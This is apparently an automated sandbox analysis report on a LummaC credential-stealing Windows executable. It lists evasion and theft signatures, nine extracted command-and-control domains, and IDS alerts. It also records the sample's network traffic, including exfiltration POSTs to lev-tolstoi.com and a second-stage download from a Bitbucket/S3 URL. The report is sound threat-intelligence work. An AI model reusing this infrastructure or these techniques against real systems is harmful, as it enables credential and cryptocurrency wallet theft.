Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jSFUzuYPG9.exe

Overview

General Information

Sample name:jSFUzuYPG9.exe
renamed because original name is a hash value
Original sample name:820f418e980b172684fe96e4aa6e50a5.exe
Analysis ID:1579761
MD5:820f418e980b172684fe96e4aa6e50a5
SHA1:a5498979325229c5494a01fddd7e8013750a5ce7
SHA256:06472667e63bfd7ffdf64b3de9b839207e2b0ab1ae17d60f6a6ad75d6fbd2800
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • jSFUzuYPG9.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\jSFUzuYPG9.exe" MD5: 820F418E980B172684FE96E4AA6E50A5)
    • WerFault.exe (PID: 8000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7428 -s 2140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1449663343.000000000168C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1450460913.000000000168C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1474910142.000000000168C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: jSFUzuYPG9.exe PID: 7428JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:38.549640+010020283713Unknown Traffic192.168.2.114970923.55.153.106443TCP
                2024-12-23T08:40:40.997004+010020283713Unknown Traffic192.168.2.1149715104.21.66.86443TCP
                2024-12-23T08:40:42.981050+010020283713Unknown Traffic192.168.2.1149721104.21.66.86443TCP
                2024-12-23T08:40:45.632810+010020283713Unknown Traffic192.168.2.1149727104.21.66.86443TCP
                2024-12-23T08:40:48.117262+010020283713Unknown Traffic192.168.2.1149733104.21.66.86443TCP
                2024-12-23T08:40:50.552331+010020283713Unknown Traffic192.168.2.1149739104.21.66.86443TCP
                2024-12-23T08:40:53.051762+010020283713Unknown Traffic192.168.2.1149748104.21.66.86443TCP
                2024-12-23T08:40:55.611278+010020283713Unknown Traffic192.168.2.1149755104.21.66.86443TCP
                2024-12-23T08:41:00.848841+010020283713Unknown Traffic192.168.2.1149767104.21.66.86443TCP
                2024-12-23T08:41:03.133628+010020283713Unknown Traffic192.168.2.1149772185.166.143.49443TCP
                2024-12-23T08:41:05.548672+010020283713Unknown Traffic192.168.2.114977752.216.152.124443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:41.741365+010020546531A Network Trojan was detected192.168.2.1149715104.21.66.86443TCP
                2024-12-23T08:40:44.039796+010020546531A Network Trojan was detected192.168.2.1149721104.21.66.86443TCP
                2024-12-23T08:41:01.601046+010020546531A Network Trojan was detected192.168.2.1149767104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:41.741365+010020498361A Network Trojan was detected192.168.2.1149715104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:44.039796+010020498121A Network Trojan was detected192.168.2.1149721104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:36.428034+010020583541Domain Observed Used for C2 Detected192.168.2.11511801.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:36.727425+010020583581Domain Observed Used for C2 Detected192.168.2.11552181.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:35.999353+010020583601Domain Observed Used for C2 Detected192.168.2.11506651.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:36.285155+010020583621Domain Observed Used for C2 Detected192.168.2.11602531.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:35.718564+010020583641Domain Observed Used for C2 Detected192.168.2.11654331.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:36.142280+010020583701Domain Observed Used for C2 Detected192.168.2.11546671.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:36.867809+010020583741Domain Observed Used for C2 Detected192.168.2.11635901.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:36.569423+010020583761Domain Observed Used for C2 Detected192.168.2.11602771.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:35.343969+010020583781Domain Observed Used for C2 Detected192.168.2.11580571.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:48.992739+010020480941Malware Command and Control Activity Detected192.168.2.1149733104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:40:39.420367+010028586661Domain Observed Used for C2 Detected192.168.2.114970923.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: jSFUzuYPG9.exeAvira: detected
                Found malware configuration
                Source: jSFUzuYPG9.exe.7428.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat", "aspecteirs.lat", "crosshuaht.lat", "sweepyribs.lat", "sustainskelet.lat", "grannyejh.lat", "necklacebudi.lat"], "Build id": "LOGS11--LiveTraffic"}
                Multi AV Scanner detection for submitted file
                Source: jSFUzuYPG9.exeReversingLabs: Detection: 63%
                Source: jSFUzuYPG9.exeVirustotal: Detection: 50%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: jSFUzuYPG9.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1308389054.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: jSFUzuYPG9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.11:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.11:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.11:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.216.152.124:443 -> 192.168.2.11:49777 version: TLS 1.2
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.11:63590 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.11:60253 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.11:65433 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.11:51180 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.11:60277 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.11:58057 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.11:55218 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.11:50665 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.11:54667 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49709 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.11:49721 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49767 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49721 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.11:49733 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49715 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49733 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49709 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49721 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49748 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49772 -> 185.166.143.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49755 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49767 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49777 -> 52.216.152.124:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HHOEN70NKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G0ZRODU1MVEYOKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15041Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VSKU0NU9BAG1J2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20410Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FFVY7DHX236User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1209Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2LZ5UATFIAIX09User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588109Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIZ7XL2U7&Signature=FCPVgbdRXx%2FDjhvQvPzU1dQ3dNE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQDOJENS5X8jDlzsJxuPb2pH5MjLxA952GUpuJ9K8c8eAgIgeBp5O3n2dCArHo7VZBQEhKa5Ybqf7xD1F%2BZzGAepczwqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDIf5Q5o38rOF7VorZiqEApSlSAviV7fqKWYqWG4d0%2BlfrC%2FFb7F%2Fc2GVH68DYRo2vd%2BAREXXJpsY5s%2BmBpFXzm6fy26oRa5GS8wZd9Nc0FYJUoSZjhvzo%2FM%2FM6PUw%2FINg1gRCi7PRFdMEoNyTOkNSC2S8%2FTK1pGG4o8hZEeM8vyBsvr0QE%2FuOcUu5JrCscWEP%2BFIPyeSmLpATVuvDiwsooP38cS3cC5Mhjir0zJP2xZUtK%2BDRPz%2BgACYHXpemn2WCxpgImxr6YWsOyoQOhLS0ii2eBVVjZpJNT1ozD%2FkBPjRAjUAEFa5C8b6hC%2FuETQ%2BEKayEkNgfTaLoNER0YYk%2BLdQYmqD3E5OEWQc3mClPsl8QceiMMSmpLsGOp0BepAG7qOdA1hoVp77QSvDNIy85cM9X4QKinihkh90Gdln%2FwS%2BMi4ynXs5fFObnXard%2B5fkTffWOZz4AAnQ1g4%2FaEEJTRdstxSXhoxukE9KAy%2Fq7WmNCu9sA6P5tOZSc7t6W8LRba2NCA3DkwySsQ7mbpcH%2Fh%2BHvf17xRCK7I%2BtWG4OCa%2FkKK4HempfXWhoX%2BEE2qBiW2nLYzf0Zo0QQ%3D%3D&Expires=1734941260 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
                Source: jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377175250.000000000165C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; con equals www.youtube.com (Youtube)
